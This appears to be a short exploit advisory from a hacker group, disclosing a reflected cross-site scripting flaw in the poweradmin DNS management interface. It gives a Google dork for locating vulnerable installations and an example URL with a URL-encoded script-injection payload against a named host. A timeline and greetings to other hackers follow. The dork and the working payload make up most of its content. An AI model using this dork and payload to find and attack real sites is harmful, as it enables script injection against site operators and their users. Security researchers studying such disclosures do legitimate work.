poweradmin Cross Site Scripting

Tekst : ##################################################
poweradmin Cross Site Scripting
##################################################

 # Exploit Title :poweradmin Cross Site Scripting
 # Google Dork:  "a complete(r) poweradmin - credits"  0r   "poweradmin - credits"
 #Author: BHG Security Center
 # Home: http://cc.black-hg.org - http://greyh4t.com/cc/
 # Tested on: [linux+apache]
 # Finder(s):Siavash (morghabi_s@yahoo.com)
 # Examle:
http://dns.giXt.com/index.php/%3E%22%3E%3CScRiPt%3Ealert%28415833140173%29%3C/ScRiPt%3E
##################################################
[-] Disclosure timeline:

[04/08/2011] - Vulnerabilities discovered
[14/10/2011] - Others vulnerabilities discovered
[15/10/2011] - Issues reported to http://black-hg.org
[04/09/2012] - Public disclosure

# Greets To :
Net.Edit0r ~ A.Cr0x ~ 3H34N ~ G3n3Rall ~ l4tr0d3ctism ~ NoL1m1t

~ Mr.XHat THANKS TO ALL Iranian HackerZ ./Persian Gulf

====[End]====